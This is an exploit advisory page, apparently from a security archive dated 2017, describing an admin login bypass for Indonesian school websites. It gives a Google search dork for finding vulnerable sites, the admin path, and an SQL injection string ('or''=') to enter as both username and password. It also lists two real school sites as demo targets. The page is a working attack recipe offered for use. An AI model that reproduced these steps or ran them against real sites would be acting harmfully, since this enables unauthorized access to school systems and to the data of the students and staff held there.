Indonesian School Admin Login Bypass

Published
Credit
Risk
2017.05.17
0N3R1D3R
Medium
CWE
CVE
Local
Remote
N/A
N/A
No
Yes
Dork: inurl:/dashboard.php?page=galeri

***************************************************
# Exploit Title: Indonesian School Admin Login Bypass
# Google Dork: inurl:/dashboard.php?page=galeri
# Exploit: /dashboard.php?page=admin or /admin
# Date: 17/05/2017
# Author: 0N3R1D3R
# Team: Indonesia To World Team
# Facebook: https://www.facebook.com/indonesiatoworld/
# Tested on: Windows 10 x64
***************************************************
[+] Search the dork in Google
[+] Open target
[+] Give exploit ( /admin ) to your target
[+] Enter username and password with
[+] Username: 'or''='
[+] Password: 'or''='
[+] Vuln? You redirected to dashboard
***************************************************
[+] Demo Site
[+] http://sman2-muaraduakisam.sch.id/admin/
[+] http://misbahunnur.com/admin/
***************************************************
Thanks To Indonesia To World Team
.:: 0N3R1D3R | EBULOBO ::.


See this note in RAW Version

 
Bugtraq RSS
Bugtraq
 
CVE RSS
CVEMAP
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn


Copyright 2017, cxsecurity.com